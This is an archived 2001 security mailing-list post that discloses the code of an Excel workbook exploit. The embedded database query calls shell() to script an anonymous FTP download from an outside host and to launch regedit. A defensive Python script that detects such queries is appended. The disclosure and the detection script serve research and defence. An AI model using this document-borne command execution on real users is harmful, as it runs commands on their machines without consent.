All,

Russ Cooper:
> Well, with the module password protected it seems clear you're not out
> to get that critique very quickly. Maybe if you'd let someone know the
> details we'd be able to answer you. As it is, we're simply left with
> what appears to be the same exploit.

Below is the code from the workbook:

[Code]
SELECT shell('command.com /C echo user anonymous yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit > c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys

[RAW Dump from the workbook from the SF web site]
SELECT shell('command.com /C echo user anonymous yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit > c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt; *.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction s=0;Threads=3;UID=admin;UserCommitSync=Yes

That will be enough information for people who want to create their own working demo.

Ollie

<%
Ollie Whitehouse
I.T Co-Ordinator - Delphis Consulting
VOX : +44 (0)207 916 0200 (Switchboard)
FAX : +44 (0)207 916 1620 (Main)
FAX : +44 (0)870 0881837 (FAX - E-Mail)
PGP : http://www.ombs.demon.co.uk/pgp.txt
Tag : Who needs Windows2000 when you have OS/2?
%>
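A triage check for the pattern visible in the dump above, added here as an example and not part of the original post: it scans workbook bytes for an embedded ODBC query that calls shell() and reports the driver named in the connection string. The function names and the sample bytes are constructed for illustration; the sample uses harmless commands.

```python
import re

# key=value pairs of an ODBC connection string; Driver={...} may contain ';'
KV = re.compile(r"(\w+)=(\{[^}]*\}|[^;\x00-\x1f]*)")

def shell_calls(text):
    """Return the raw argument text of every shell(...) call in a query."""
    found = []
    for m in re.finditer(r"\bshell\s*\(", text, re.I):
        depth, quoted, i = 1, False, m.end()
        while i < len(text) and depth:
            c = text[i]
            if c == "'":
                quoted = not quoted        # parentheses inside '...' do not count
            elif not quoted:
                depth += (c == "(") - (c == ")")
            i += 1
        if depth == 0:                     # ignore calls with no closing ')'
            found.append(text[m.end():i - 1])
    return found

def triage(blob):
    """Scan workbook bytes for an embedded ODBC query that invokes shell()."""
    text = blob.decode("latin-1")          # 1:1 byte mapping, never raises
    conn = {k.lower(): v for k, v in KV.findall(text)}
    calls = [c for q in re.findall(r"SELECT[^\x00]*", text, re.I)
             for c in shell_calls(q)]
    return {"driver": conn.get("driver"), "dbq": conn.get("dbq"),
            "shell_calls": calls, "suspicious": bool(calls)}

# Constructed sample: same layout as the dump above, harmless commands.
SAMPLE = (b"\x09\x08SELECT shell('command.com /C echo (test) > c:\\demo.log'),"
          b" shell('command.com /C ver',1)\r\nFROM config.sys\x00config\x00\x01"
          b"DBQ=C:\\;DefaultDir=C:\\;Driver={Microsoft Text Driver (*.txt; *.csv)};"
          b"DriverId=27;FIL=text;UID=admin\x00")
# Constructed sample: an ordinary text-driver query with no function calls.
CLEAN = b"\x09\x08SELECT name, size FROM files.csv\x00DBQ=C:\\;FIL=text\x00"

if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(CLEAN))
```

A hit means the file should be opened only with query refresh disabled and the query text reviewed; the check is a string heuristic and does not parse the workbook format itself.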
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:24 PDT